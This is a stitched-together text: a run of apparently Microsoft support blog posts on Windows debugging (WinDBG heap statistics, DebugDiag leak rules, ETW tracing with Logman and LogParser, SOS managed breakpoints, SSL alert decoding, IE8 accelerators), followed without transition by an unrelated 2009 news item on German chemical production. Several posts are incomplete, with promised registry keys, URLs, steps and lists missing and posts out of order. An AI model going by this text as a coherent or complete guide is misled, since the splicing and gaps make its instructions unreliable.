(bytes) Busy Free Busy Free Total Average 20: ------------------------------------------------------------------ 21: 0 - 1024 64 142 0 0 0 0 22: 1024 - 2048 279 24 0 0 2280 8 23: 2048 - 3072 21 3 0 0 176 8 24: 3072 - 4096 2 3 0 0 16 8 25: 4096 - 5120 69 6 0 0 560 8 26: 5120 - 6144 6 0 0 0 48 8 27: 6144 - 7168 35 3 0 0 280 8 28: 7168 - 8192 0 2 0 0 0 0 29: 8192 - 9216 0 1 0 0 0 0 30: 9216 - 10240 2 1 0 0 16 8 31: 12288 - 13312 2 0 0 0 16 8 32: 13312 - 14336 0 1 0 0 0 0 33: 19456 - 20480 2 0 0 0 16 8 34: 24576 - 25600 2 0 0 0 16 8 35: 36864 - 37888 0 1 0 0 0 0 36: ------------------------------------------------------------------ 37: Total 484 187 0 0 3424 7 From the above output, you can also see the ranges of memory and their utilization. We can also obtain worst offender byte sizes and worst offender count size by using the –stat parameter of !heap command. Here’s the output. 1: 0:000> !heap -stat -h 02a10000 2: heap @ 02a10000 3: group-by: TOTSIZE max-display: 20 4: size #blocks total ( %) (percent of total busy bytes) 5: 1008 45 - 45228 (26.78) <----------- Worst offender Bytes (WOB) 6: 19f8 21 - 358f8 (20.75) 7: 418 c6 - 32a90 (19.62) 8: 5e8 21 - c2e8 (4.72) 9: 6008 2 - c010 (4.65) 10: 5a0 21 - b9a0 (4.49) 11: 4c08 2 - 9810 (3.68) 12: 1440 6 - 7980 (2.94) 13: 808 d - 6868 (2.53) 14: 3008 2 - 6010 (2.33) 15: 2708 2 - 4e10 (1.89) 16: 1808 2 - 3010 (1.16) 17: a18 4 - 2860 (0.98) 18: 6c0 5 - 21c0 (0.82) 19: 408 6 - 1830 (0.59) 20: c08 2 - 1810 (0.58) 21: ac0 2 - 1580 (0.52) 22: a90 2 - 1520 (0.51) 23: 778 2 - ef0 (0.36) 24: 450 1 - 450 (0.10) All values are in hex in the above output except the percent column. So from the above output (line # 5) we can say that worst offender bytes [WOB - allocation size that is using the most bytes in the heap] is 0x1008 Bytes [4,104 Bytes or 4K] and it adds up to a total of 0x45228 Bytes [283,176 Bytes or 276 KB] Similarly, you could group by block size if you want to figure the worst offender count size [WOC - allocation size that has the most duplicates in the heap] and count of worst offender count by using the –grp switch. 1: 0:000> !heap -stat -h 02a10000 -grp B 3: group-by: BLOCKCOUNT max-display: 20 4: size #blocks total ( %) (percent of totalblocks) 5: 418 c6 - 32a90 (47.26) <----------- Worst offender count (WOC) 6: 1008 45 - 45228 (16.47) 7: 19f8 21 - 358f8 (7.88) 8: 5e8 21 - c2e8 (7.88) 9: 5a0 21 - b9a0 (7.88) 10: 808 d - 6868 (3.10) 11: 1440 6 - 7980 (1.43) 12: 408 6 - 1830 (1.43) 13: 6c0 5 - 21c0 (1.19) 14: a18 4 - 2860 (0.95) 15: 6008 2 - c010 (0.48) 16: 4c08 2 - 9810 (0.48) 17: 3008 2 - 6010 (0.48) 18: 2708 2 - 4e10 (0.48) 19: 1808 2 - 3010 (0.48) 20: c08 2 - 1810 (0.48) 21: ac0 2 - 1580 (0.48) 22: a90 2 - 1520 (0.48) 23: 778 2 - ef0 (0.48) 24: 450 1 - 450 (0.24) Thus in this case, the most duplicates are of allocation size 0x418 bytes [1048 Bytes] and there are 0xc6 [196] of them. You could also dump the allocations in the 1 K – 4 K range and then dump out the contents using the address value in UserPtr column. To do that execute: dc <address value in UserPtr column> Warning: This command can generate a huge output as it dumps allocations in the specified range from all heaps. 1: !heap -flt r 418 1008 2: _HEAP @ 2a10000 3: HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 4: 02a14a58 0084 00f0 [01] 02a14a60 00418 - (busy) 5: 02a15000 0084 0084 [01] 02a15008 00418 - (busy) 6: 02a20330 0144 0102 [01] 02a20338 00a18 - (busy) 7: 02a25a40 0102 0144 [01] 02a25a48 00808 - (busy) 8: 02a265f0 00be 0102 [01] 02a265f8 005e8 - (busy) 9: 02a2d1b0 00b5 00be [01] 02a2d1b8 005a0 - (busy) 10: 5e9c0040 0084 00b6 [00] 5e9c0048 00418 - (free) 11: 7c1d0040 0084 0084 [00] 7c1d0048 00418 - (free) 12: . 13: . 14: 15: dc 02a14a60 So our story so far… Next questions: So what are these heaps and who is allocating here? If you want to see the stack back trace for the allocation, you can dump out the page heap information for a given address [UserPtr], but stack back trace is only displayed when available. If I remember correctly, it is available when page heap is enabled for the process. 1: 0:000> !heap -p -a 7c1d0048 2: address 7c1d0048 found in 3: _HEAP @ 2a10000 4: HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 5: 7c1d0040 0084 0000 [00] 7c1d0048 00418 - (free) 6: Trace: 0025 7: 7c96d6dc ntdll!RtlDebugAllocateHeap+0x000000e1 8: 7c949d18 ntdll!RtlAllocateHeapSlowly+0x00000044 9: 7c91b298 ntdll!RtlAllocateHeap+0x00000e64 10: 102c103e MSVCR90D!_heap_alloc_base+0x0000005e 11: 102cfd76 MSVCR90D!_heap_alloc_dbg_impl+0x000001f6 12: 102cfb2f MSVCR90D!_nh_malloc_dbg_impl+0x0000001f 13: 102cfadc MSVCR90D!_nh_malloc_dbg+0x0000002c 14: 102db25b MSVCR90D!malloc+0x0000001b 15: 102bd691 MSVCR90D!operator new+0x00000011 16: 102bd71f MSVCR90D!operator new[]+0x0000000f 17: 4113d8 MyModule1!AllocateMemory+0x00000028 18: 41145c MyModule1!wmain+0x0000002c 19: 411a08 MyModule1!__tmainCRTStartup+0x000001a8 20: 41184f MyModule1!wmainCRTStartup+0x0000000f 21: 7c816fd7 kernel32!BaseProcessStart+0x00000023 The above output is just an example but you get the idea of how you can use this technique to help track the source of leaks in your application. When memory at a given address is de-allocated, the heap manager checks how many contiguous bytes are free around that address. After that check is complete, the heap manager can do one of two things: There is a registry key that controls the de-commit behavior. That key is: For sake of completing this blog post, adjusting the value for this registry key was the resolution in my example. It could be something else in your case depending on the circumstances under which this occurs. Once a software developer has enough information about the pattern and source of the memory consumption, he will be able to recommend changes or make a suitable fix to resolve the issue. In this blog post, I made an attempt to show how you can track down native memory leaks manually vs. using DebugDiag scripts as discussed in this blog post. Again, this doesn’t apply to every situation as there are umpteen possibilities to the cause of a leak. Hopefully this blog post is a good starter and a future reference. In my last post, I discussed a generic approach to collecting memory dumps using Debug Diagnostics tool. In this post, I discuss how to use DebugDiag’s memory pressure scripts. Please note that the current version of DebugDiag does not have the ability to look up .NET heaps and draw conclusions. For .NET debugging, the best resources are the following blogs: Tess’s Blog Doug's Blog Step 1: Capture a high memory dump as discussed in this post. Step 2: Start Debug Diagnostics Tool. If prompted to select a rule, click Cancel. Step 3: Select the Analysis Tab and select the memory pressure analysis scripts Step 4: Add the dump files for analysis Step 5: Start analysis Wait for DebugDiag to finish. DebugDiag will automatically connect to the Microsoft Public symbol server, download and cache symbols on your local drive for analysis. You can also add your custom symbol stores and the location where you want to cache the symbols using the Tools, Options & Settings dialog box. Have fun! Debugging native memory leaks is one of the most difficult things to do - (at least for me). There are a few Escalation Engineers at Microsoft Product Support Services who are extremely good at debugging all kinds of issues. I learn a lot from these guys whenever I get an opportunity. In this blog post, I am not going to talk about a specific issue, but rather a general approach to debugging native memory leaks. I work in the IIS/ASP support group and therefore some things I discuss may be more IIS/ASP specific at times. To solve the problems of common debugging issues, Escalation Engineers in the IIS support group created a fantastic tool called Debug Diagnostics Tool. This link points you to to the 32 bit (x86 version). To obtain the 64 bit (x64) version, you need to call Microsoft Product Support at this time. What this tool allows you to do is inject a module called Leaktrack.dll into the target process so that it starts collecting allocation/de-allocation information. The concept is simple - create a heap where you track allocations from various memory managers. It works by hooking into the known Windows memory managers NTDLL, MSVCRT etc. How it works When a module makes an allocation request, it increments the count and also gets the size of allocation and also maintains a total size of allocation. When a de-allocation request is made by the same component, it reduces the count and updates the totals. For this to work effectively, you must inject leaktrack soon after you start the process. When the process has consumed memory in the upwards of 700 MB, you can dump out the process and then run Debug Diag’s inbuilt memory pressure analysis scripts against that dump file. Debug Diag is so cool that it will connect to the public Microsoft symbol server, download the symbols, analyze and create a nice report about the memory allocations and components responsible for those allocations. It is very easy to determine issues related to memory leaks & fragmentation with DebugDiag script. DebugDiag is very effective against issues in web applications hosted in IIS worker processes because it uses heuristics and is accurate many times. Below are the screen shots on how to setup a leak rule in Debug Diag. NOTE: If you are debugging a web application hosted in IIS that is leaking memory, before you setup a memory leak rule, restart IIS and then send the first request to the application. This is to start tracking from the beginning of the life of the process and also to start the IIS worker process. Step 1: Open Debug Diagnostics Tool Step 2: If prompted to select a rule, select Memory & Handle Leak OR click Add Rule button to get to this screen Step 3: Click Next to get to the Select Target Screen. Then select w3wp.exe if debugging IIS process or the process that you wish to debug. If you see multiple worker processes & is not sure which w3wp.exe instance to select, run the following command from a command prompt running as Administrator CScript %windir%\system32\iisapp.vbs The above script will output the IIS web application pool name and its corresponding PID value that you can use below. Step 4: Click Next, then click On the Configure button Step 5: Setup the rules as follows Step 6: Click Save & Close and then the Next Button from the previous screen. Step 7: Type in any name that you like for the rule and also type in the path where you want the dumps to be generated. This drive must have lots of disk space as each dump file will be equal to the size of the process when the dump is captured. So since we are capturing it at 800 MB upwards here as in this example, this will create 10 dumps (by default) of 800 MB or higher each. Step 8: Finish up the rule and activate it. Then make sure you see the information screen like below You are done! You can see the rules that you just configured in the rules window. When a dump is captured, the userdump count column will have a value of 1 or more. Next Post: Using Analysis Scripts. So, you have a managed dump and you want to find out the request headers. Here’s one of the methods I use to find this information. I use it especially when I want to view the session ID or cookies. String: Connection: Keep-Alive Cookie: ASP.NET_SessionId=5kwvjlzd3ksgii45ephn00aq; HTTP_REFERER::6841= Host: Skyraider User-Agent: DebugDiag Service HTTP Pinger String: Connection: Keep-Alive Cookie: ASP.NET_SessionId=5kwvjlzd3ksgii45ephn00aq; HTTP_REFERER::6841= Host: Skyraider User-Agent: DebugDiag Service HTTP Pinger Hopefully this is what you wanted. In one of my earlier posts, I discussed one of the reasons for compression failure and how we identified it using ETW traces and resolved it. Below are the list of other reason codes for your reference. For additional information, refer to this blog post from IIS support team. You may perhaps have used Event Tracing Feature of Windows aka ETW for debugging many server side problems related to IIS. When I first learnt about ETW and started using it, I found it to be really cool! Unfortunately there’s not a lot of documentation around using it. For Eg: When to use which provider. it will be helpful to know which providers emit what information so that we can use a specific set of providers rather than a whole bunch of them, which of course will generate a ton of data. Looking through lots of data can sometimes be painful. Take an example where you want to enable ETW tracing but it may take a day or two for the problem to reproduce. Parsing the generated log can be a nightmare! So… I decided to put together this blog that gives information about some of the providers, if not all. For a list of providers available on your machine, execute the following from a command prompt: Logman Query Providers The following table lists the details about providers (that I use usually) & their trace areas (where available). Use any combination of these providers depending on what problem you are troubleshooting. NOTE: ETW tracing is also very helpful when you want to view what is happening on the server side over a SSL connection. I already have a blog post on using ETW providers to capture data & parsing ETW traces. Windbg is a native debugger and you can use it to set a breakpoint on a virtual address. Any managed code running within the process wouldn’t have a virtual address associated with it until it is JIT compiled. Thus setting a breakpoint on a managed function is a bit tricky in Windbg. You can set a breakpoint on managed methods using windbg only: When I started learning how to set managed breakpoints, one of the first questions I had is: How to set a breakpoint on a specific line of code in a managed method – because that is what we usually do in other IDE environments like Visual Studio. This is somewhat very difficult to do because, though you can get the virtual address where your method starts using the SOS commands, you will need to know the exact offset from the method’s starting virtual address [The actual address which corresponds to your line of code] and it isn’t easy at all to co-relate that to your source code. You will need to have an extremely good understanding of IL code, un-assemble the function using !u command and then set the breakpoint on that address. I do not have that skill yet, but will surely put out a post once I figure that out. So over here, I will describe how to set a breakpoint on a managed method for .NET Framework 2.0. STEP 1: So assuming you are doing a live debug, the first step is to attach to the process that you want to debug. You can use the attach option in Windbg user interface [File menu]. Then load the SOS debugger extension - !loadby SOS mscorwks STEP 2: You need to know which method you want to set a breakpoint on. The SOS command you need is !dumpmt with the –md parameter. This lists out the method table. For example, Dump the method table of System.Timespan 1: !dumpmt -md 0x7911228c 2: EEClass: 791121e4 3: Module: 790c2000 4: Name: System.TimeSpan 5: mdToken: 02000114 (C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll) 6: BaseSize: 0x10 7: ComponentSize: 0x0 8: Number of IFaces in IFaceMap: 3 9: Slots in VTable: 56 10: -------------------------------------- 11: MethodDesc Table 12: Entry MethodDesc JIT Name 13: 796d2710 7914fb28 NONE System.TimeSpan.ToString() 14: 793624d0 7914b950 PreJIT System.Object.Finalize() 15: 796c07f8 7914fb08 NONE System.TimeSpan.CompareTo(System.TimeSpan) 16: 796d2708 7914fb18 NONE System.TimeSpan.Equals(System.TimeSpan) 17: 79381054 79266eb8 PreJIT System.TimeSpan..ctor(Int64) 18: 7939f058 79266ec0 PreJIT System.TimeSpan..ctor(Int32, Int32, Int32) 19: 7939f07c 79266ed8 PreJIT System.TimeSpan.get_Ticks() 20: 794002c8 79266ee0 PreJIT System.TimeSpan.get_Days() 21: 794002e8 79266ee8 PreJIT System.TimeSpan.get_Hours() 22: 79400328 79266ef0 PreJIT System.TimeSpan.get_Milliseconds() 23: 7940036c 79266ef8 PreJIT System.TimeSpan.get_Minutes() 24: 794003ac 79266f00 PreJIT System.TimeSpan.get_Seconds() 25: 794003ec 79266f08 PreJIT System.TimeSpan.get_TotalDays() 26: 7940040c 79266f10 PreJIT System.TimeSpan.get_TotalHours() 27: 79380c10 79266f18 PreJIT System.TimeSpan.get_TotalMilliseconds() 28: STEP 3: [Optional] Using the method descriptor command, !dumpmd you can view if the code is JITted. See line #7 below. You can skip this and go to STEP 4 directly using the corresponding MethodDesc value from the previous output. 1: !dumpmd 79266f18 2: Method Name: System.TimeSpan.get_TotalMilliseconds() 3: Class: 791121e4 4: MethodTable: 7911228c 5: mdToken: 0600101e 6: Module: 790c2000 7: IsJitted: yes 8: m_CodeOrIL: 79380c10 STEP 4: Add the breakpoint using !bpmd –md command. 1: !bpmd –md 79380c10 Another way… Syntax: !bpmd <ModuleName> <FunctionName> Example: !bpmd mscorlib.dll System.TimeSpan.get_TotalMilliseconds Notes Once your breakpoints are set, you can execute the g command to let the process execute till it hits the breakpoint. Once it hits the breakpoint you can do other tasks like examine callstacks, stack objects, local variables etc. Issues related to high memory utilization on an IIS application server are common. With .NET there is a little misconception that the Garbage Collector (GC) will clean up objects and therefore the process can never run out of memory. This isn’t true. GC will never clean up an object which is in use. If that was the case, you can imagine the kind of problems it would create. While debugging memory problems, it is a good idea to capture memory dump when the process memory consumption is at its peak maximum usage. For .NET applications, a System.OutOfMemoryException is thrown when GC fails on a VirtualAlloc(). So how do we capture a memory dump when this Exception is thrown? Here’s how. For .NET Framework version 1.1 Open the registry path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework Key: GCFailFastOnOOM Type: DWORD Value: 2 Open the registry path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework Key: GCFailFastOnOOM Type: DWORD Value: 2 For .NET Framework version 2.0 and above Open the registry path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework Key: GCBreakOnOOM Type: DWORD Value: 2 Key: GCBreakOnOOM Setting the above key causes a DebugBreak within the process when a System.OutOfMemoryException is encountered. You can then use a tool like DebugDiag or a Debugger like WinDBG/CDB/NTSD to capture a dump on this DebugBreak Exception. Windbg/CDB/NTSD debuggers are for advanced users and DebugDiag is generally preferred due to ease of use and is designed to be used in production environments. Configuring Debug Diagnostic Tool NOTE: When the dump is captured, the Userdump count column will be incremented by 1. You can then do post mortem debugging using Windbg and SOS. Continuing my conversations on using tools, today I want to explain how to capture an ETW trace and parse it. Event tracing for Windows (ETW) is a very powerful, tracing mechanism built into the Windows operating system that allows you to view messages from various subsystems. This is very helpful in troubleshooting problems on the server side. We use it a lot in the IIS support group to troubleshoot various customer issues. In an earlier post, I discussed and explained the various Providers in Windows that spit information. We will use some of these providers today. To view a list of providers available on your system, run the following command in a command prompt window. Logman query providers Logman query providers Stage 1: Capture an ETW trace in Windows Server 2003 with Service Pack 1 or upwards. NOTE: You must be logged on as a computer administrator to perform these steps:} Now delete the values from the first column. We get: } Now we will add flags to each provider. Flags indicate the areas to trace and the verbosity levels. Each flag will be separated by a TAB. After each entry, press Tab and type 0xFFFFFFFF, press Tab and type 0x5. For IIS: WWW Server only, this will be 0xFFFFFFFE 0x5. The flags 0xFFFFFFFF & 0xFFFFFFFE indicate all areas and 0x5 indicates full verbose mode. Thus, we get: Now, we can reproduce the problem. Execute the HTTP request from any HTTP capable client or make the request via browser. Once the problem has been reproduced, we can stop the trace as follows: At the command prompt, type: Logman –stop MyTrace –ets <enter> We should now have a file called MyTrace.ETL in C:\ETW folder. This file is not readable using any editor. It first needs to be parsed. Stage 2: Parsing an ETW Trace. OK, so we now have a trace file that cannot be read by any editors because it is a binary file. To parse an ETW trace file, we need another tool – LogParser. I am sure many have heard great stories about this. This is another powerful tool and provided by Microsoft as a free download. Download LogParser v2.2. Then install it to C:\LogParser folder. Important: You need to parse an ETW trace on the same version of the OS from where it was captured. This is because the ETW providers will be different for different versions of Windows. Before you can use LogParser, there are a couple of things you need to do - Register LogParser.dll in system registry and make a slight modification to the parsing Windows script so that it doesn’t prompt you. We are now ready to parse the ETW trace file. At the second command prompt, type the following command and press ENTER Cscript DumpTraceReqs.js C:\ETW\MyTrace.etl > Output.txt <enter> Cscript DumpTraceReqs.js C:\ETW\MyTrace.etl > Output.txt <enter> Wait for the command to finish and then open the file, Output.txt in Notepad. You should now have a file that contains a very organized collection of information that shows the activities in each stage of the request processing pipeline. Any kind of permissions problems, compression failure etc should show up here. It is self explanatory. However, if you do have questions on what you see in the ETW trace file, please share it or post it here and I’ll help. LogParser is a very powerful tool and you can use SQL like commands for a variety of purposes including reading event logs, IIS logs, Pure text files, Network trace files and many others. It also includes many functions which you can use to transform data. Take a look at this post that contains a lot of examples. I hope you found this post useful in debugging problems. Please feel free to leave your feedback. Recently, we ran into a problem where static or dynamic compression would not work on a few websites, specially SharePoint sites, but works on other sites. I always use our software tools and take a data driven approach for troubleshooting any kind of software problem. Software tools not only help you pin point problem area, but also assists in effective troubleshooting. Without data driven approach, we are pretty much into a guessing game or trial & hit method. OK. So the next step is identify what tool(s) to use and the answer is – It depends. It depends on where you are troubleshooting (client side/server side etc). We know that IIS server is responsible for sending compressed responses. So naturally, we want to know why IIS isn’t compressing responses. There are many cases where IIS will not compress a response. For e.g. requests with status code 401. For a list of reasons, please refer to this blog post from Mike Laing, Escalation Engineer, Microsoft IIS support. The most effective tools to trace into IIS are: ETW is the most easiest and preferred method because, unlike DebugView trace, it doesn’t require any registry changes and restart of the IIS services. In an earlier post, I discussed how to capture and parse an ETW trace. Back to the problem… So in this case, here’s what the ETW trace showed us: IISCompression: STATIC_COMPRESSION_NOT_SUCCESS - IIS has been unsuccessful doing static compression Reason: COMPRESSION_DISABLED CAUSE: The problem occurs only when you use a custom account for application pool identity, which was the case here as well. When using a custom account for application pool, you must provide read permissions for that application pool identity on the metabase compression keys within IIS configuration file – metabase.xml, located in %windir%\system32\inetsrv, so that it can read the settings. A failure reading the settings will cause a status of COMPRESSION_DISABLED. Honestly, I didn’t know the cause at the top of my head, but a genius (Vivek Kumbhar) in my team who fiddles around a lot with his machine knew the cause & resolution. I am trying to find out how we can track down this failure due to lack of permissions on certain metabase keys. I will update this post after that. I will also document the various reasons and their associated causes. SOLUTION So when using a custom identity for the application pool, take these additional steps Internet Explorer 8 is expected to be available in the near future. It packs a whole lot of features. I downloaded the latest RC1 build from the Microsoft site and did some testing. This version packs in a whole lot of browser extensibility features besides many other CSS improvements. One of the extensibility features is Accelerators. Accelerators allow users to quickly send information to a web service and get back some information. For example, you may be browsing a web page and came across a word for which you want to lookup the meaning. This is one of the scenarios where you can use accelerators. Websites can offer to install Accelerators as part of their service. A end user can then install Accelerators of his choice and just highlight a word on the web page and then select an Accelerator to use from a list of installed Accelerators. Internally, Internet Explorer 8 sends the highlighted text as a parameter to the selected Web Service and opens a new Internet Explorer Window OR a preview window where you can see the results. So, how do you create a new accelerator for your website? It’s really simple! Here’s how to create one. Step 1: Offer to install the Accelerator from your web page. For example, in your web page, add the following: 1: <h1>Dictionary Lookup Accelerator</h1> 2: <button onclick="window.external.AddService('')"></button> So what is window.external.AddService() method? That’s one of the new extensibility API in IE 8. More information is here Step 2: Create your Accelerator definition XML file. 1: <?xml version="1.0" encoding="UTF-8" ?> 2: <openServiceDescription xmlns=""> 3: <homepageUrl></homepageUrl> 4: <display> 5: <name>Lookup in Dictionary</name> 6: </display> 7: <activity category="Define"> 8: <activityAction context="selection"> 9: <preview method="post" action=""> 10: <parameter name="txtSearchFor" value="{selection}" type="text" /> 11: </preview> 12: <execute method="post" action=""> 13: <parameter name="txtSearchFor" value="{selection}" type="text" /> 14: </execute> 15: </activityAction> 16: </activity> 17: </openServiceDescription> The XML file we just created is called the service description file and it contains specific description about the service provider and type of service it provides. The first 2 lines define the OpenServiceFormat using the xml file version and the namespace. The namespace merely defines all elements in this specification. These lines must be in there. The <homepageUrl> property : : The child of display element & contains the name of the service. There can only be one instance of this element in the XML file and the number of characters cannot exceed 50. You can add 2 more child elements under the display element : The next section describes the Accelerator and its capabilities The <activity> element : Describes the activities of this accelerator. The category attribute defines what the category of the accelerator such as Search, Map, Define. You can define your own category but there must be only one instance of this element. The <activityAction> element : Child of <activity> element. This section defines information that is specific to a context of the activity using a context attribute. The context attribute indicates on what the accelerator should act upon. It can be one of the following values: The <preview> element : Child of <activityAction> element. You can preview the information without opening the site. Internet Explorer 8 will open a box where you can preview the information without actually opening the web page. The preview element defines the action for preview. In the above example, we asked it to post the information to a specific web service URL – dictionary.asp using the action attribute. This is similar to the action attribute in a web page. The method attribute is self explanatory. The <parameter> element : Child of <preview> or <execute> element. The <parameter> element defines the name and values you want to pass to the URL when executing a preview or execute. This is the posted data to the service. If you are not sure what the parameter names are for a service, such as live search or Encarta dictionary, you can use Fiddler to figure it out. The {selection} is like a variable. It will be replaced by the user selected value when invoking the web service. The Type defines the parameter data type. The <execute> element : This element defines the action to take upon executing the accelerator. Typically this opens a new instance of the browser and displays the results using the posted data. If you want to get started quickly, simply copy the XML from above and modify the parameters and use it. If you don’t yet have a site or IIS, simply download and install Visual Web Developer from here. Then Isn’t it simple and really cool feature? That’s it for now. Hope you will have fun creating your own accelerators and improve your browsing experience. Unlike native debugging, you don’t need symbols for debugging managed code. SOS.dll can also be used with WinDBG and Visual Studio debugger. Simply use the intermediate window in Visual Studio to load SOS.dll and then you can use the commands provided by the extension. My favorite blog for managed debugging (and almost everyone else’s) is by Tess Ferrandez-Norlander. Tess is an Escalation Engineer with Microsoft. I don’t think anyone else explained managed debugging better than Tess. It is a good place to start with the basics & I highly recommend reading her blog. Her blog not only teaches the techniques of debugging, but also contains code examples that illustrate various problems. The comments section of each post also has very valuable information. So here, I explain how I go about looking at high memory dumps: Big Question: I always have a question in my mind: Where is most of the memory? Then start looking for it. Once I identify what all components are majorly contributing to memory usage, I check to see if the problem can be resolved with a hotfix. While this usually requires identifying patterns and some experience knowledge, for beginners, it is still worth checking the Microsoft support site to see if the problem you are running into is described in a KB article and if a hotfix is available. The easiest way is to stay updated because Microsoft continuously investigates such issues and provides hotfixes. If the problem is traced down to application code, the developers should work to reduce memory usage. First step - Open the dump in WinDBG. For instructions on setting up WinDBG, please see this post. First, we need to find out where “most” of the memory is. A debugger command is available that will help us here – !address –summary. To effectively understand and interpret what the output means we need to first understand what the output values represent. Take a look at this MSDN article. In the output of !address –summary command, the column named “KB” indicates in KiloBytes, the amount of memory in each of these “areas” and the Pct(Tots) column indicates a percentage of the value in KB column against Total address space (4 GB on 32 bit). Thus, if RegionUsageIsVAD is high, it indicates that most memory is in virtual allocations. .NET heaps are made with calls to VirtualAlloc. The GC in .NET uses the Microsoft Win32® VirtualAlloc() application programming interface (API) to reserve a block of memory for its heap. Depending on the flavor of GC in use, it may be 32 MB (Workstation GC) allocations or 64 MB (Server GC). For ASP.net applications running in IIS, by default, the Server GC is automatically selected, if the computer has 2 or more processors. Similarly, RegionUsageFree indicates most of memory is “Free”. If applications start throwing out of memory exceptions and a captured dump shows most of memory is Free, then it indicates fragmentation within the process address space. Typically if 30% or more of memory is Free, then I’d suggest investigating why memory is fragmented. If RegionUsageImage is high, then in means you have lots of DLLs being loaded in the process. Ideally 100 MB or less is good. ASP.NET applications should not have debug attribute set to TRUE in web.config. Enabling debugging emits debug information which can be an overhead and cause memory problems. Similarly, there should not be any modules that are built in debug mode. If RegionUsageHeap is high, it means most of the memory is on heaps. Eg the C Runtime heap, MDAC (Microsoft Data Access Components) heap, heaps used for compression etc. When you use the MSVCRT.dll library, it internally ends up allocating on the C runtime heap by calls to the CAlloc API. Note that there are many tools out there (not just winDBG) that allows you to identify the allocation profiles of applications. Eg: For .NET applications you can use CLRProfiler (Microsoft) and Ant’s Profiler (RedGate). I do not know about profilers for native C, C++ applications. However Debug Diagnostics Tool v1.1 from Microsoft includes a capability for injecting a DLL – Leaktrack into the process that hooks into the calls like CAlloc and can keep track of who made the allocations. DebugDiag also includes a Memory pressure analysis script that can read a dump with leak track injected and give you a very nice report on where the allocations are – By size, by count and many other parameters. It’s 99% helpful in debugging web applications hosted on IIS. I will discuss this in another blog post. WinDBG is usually used in post mortem debugging. Profilers should be used only in development and test environments, not production. They are very invasive and will reduce performance by about 10 times. Continuing a bit more about RegionUsageIsVAD… If you determine that most memory is from Virtual Allocations AND you have ASP.net web applications running in IIS, then almost always it is likely that large amounts of memory is allocated in managed heaps. You will then need to investigate into .NET heaps to determine the top memory consumers. That’s where the !dumpheap –stat command comes into the picture. More in my next post. In one of my earlier post I explained how to use Microsoft Network Monitor to debug a networking problem. Network trace tools aren’t very useful in debugging problems when the channel is secured (HTTPS) and you need to view the data to make your conclusions. However you can still debug SSL handshake failures using network monitor. Here’s a scenario. A client (Not browser) is trying to connect to a IIS web server by sending its client certificate to post some data. However, the IIS machine always rejects the authentication. The first step was to take a network trace as usual. For instructions on how to capture simultaneous traces, see this post Analyzing the network trace: I filtered the traffic by the keyword SSL. In the display filter tab, type SSL and click on Apply button. Here are some of the frames the we picked from the capture: During SSL connection negotiation process, the client and server can mutually exchange certificates for authentication. The client authentication can be optional. To understand more about how the SSL negotiation takes place, please see these Microsoft KBs Description of the Secure Sockets Layer (SSL) Handshake Description of the Server Authentication Process During the SSL Handshake Essentially, what is going on here can be summarized as: While performing any type of debugging, we need to follow the data; we need to look for something that is “interesting”. In this case an “alert” from the server is being sent. So we looked at what this alert is. Since our “interesting” frame is 32, we looked more at the headers and the details in the frame. Here is the frame in detail Frame: Number = 32, Captured Frame Length = 61, MediaType = ETHERNET + Ethernet: Etype = Internet IP (IPv4),DestinationAddress:[MAC Address],SourceAddress:[Source MAC Address] + Ipv4: Src = ServerIP, Dest = ClientIP, Next Protocol = TCP, Packet ID = 5022, Total IP Length = 47 + Tcp: Flags=...AP..., SrcPort=5443, DstPort=1100, PayloadLen=7, Seq=2764379044 - 2764379051, Ack=3896915131, Win=64240 (scale factor 0x0) = 64240 - Ssl: Encrypted Alert. - TlsRecordLayer: ContentType: Encrypted Alert - Version: TLS 1.0 Major: 3 (0x3) Minor: 1 (0x1) Length: 2 (0x2) EncryptedData: Binary Large Object (2 Bytes) Here is the handshake data in Hex (This data isn't encrypted yet because the handshake is still in progress) 00 1E 68 0F 3E 80 00 30 48 7E 1B 90 08 00 45 00 00 2F 13 9E 40 00 3D 06 D2 0E 0A F4 40 0F 0A 33 02 E7 15 43 04 4C A4 C5 13 A4 E8 46 34 BB 50 18 FA F0 2B B8 00 00 15 03 01 00 02 02 2A We can conclude a lot from this frame. We know that this is an ethernet packet. The TCP flags set are AP, which means transfer data to the end application on the client without buffering at the TCP level, the communication port on the server is 5443, the client port is 1100, the window size for data transmission is 64240 bytes and so forth. The most interesting set of data is the TLS record layer… It shows the major and minor versions in use after negotiation and the length of the data, which is 2 bytes. This data is encrypted. So here’s the trick now. This is an encrypted alert and RFC defines the alert descriptions. You can find it here for TLS 1.0 (Transport layer security) Take the hex value of the 2 bytes of this message, which is 2A (The last 2 values, all values before this are headers in hex and we can ignore that because network monitor already gave us that information) Using Windows calculator, convert hex 2A into decimal. We get: 42. Now, let’s go look at the TLS 1.0 RFC to find out what what decimal value 42 represents for Alert Description. You can search for “AlertDescription” on the page. You should get:; Thus, we can see that 42 translates to bad_certificate. So we can say that the client sent a bad certificate to the server and therefore the server rejected the connection request. Armed with this information, we checked the client certificate in the certificate store and indeed, we had a bad certificate. Replacing it with a good certificate fixed the problem! Software has some a long way and enabled people around the world to do many things. It has also made our lives so much easier. However these new capabilities have also created new problems and the answers to those problems are software tools which are excellent utilities for debugging these problems. I want to once again thank all those developers who made these tools, continue to improve and build new tools. It makes the job of a support professional much easier and helps a lot of customers resolve complex problems. Thank you! I.
http://blogs.msdn.com/sudeepg/
crawl-002
refinedweb
7,722
64.3
03 November 2009 17:07 [Source: ICIS news] LONDON (ICIS news)--The German chemical industry's recovery is continuing to improve amid increasing demand for more base and specialty products from Asia and ?xml:namespace> Chemical production rose 4% in the third quarter compared to the previous one, with revenue also rising 5.5%. Production previously rose 2.5 % in the second quarter from the first. "It is encouraging that more and more industrialised nations are freeing themselves from the grip of the economic crisis,” said Ulrich Lehner, VCI Chairman. "Industrial production in However VCI said full year chemical production would drop about 10% from 2008, the biggest year-on-year decline since 1975, and it added that full year industry sales would fall 12% from 2008. It also said VCI said that despite industrial production in Employment in the German chemical industry, the country’s fourth-largest sector, fell 2% year on year to about 432,900 in the third quarter of 2009. Meanwhile, in its autumn projection for 2009 the European Commission raised However the Commission said German GDP was expected to contract 5.0% in 2009, grow 1.2% for 2010, and show a further growth of 1.7% for 2011, the Commission
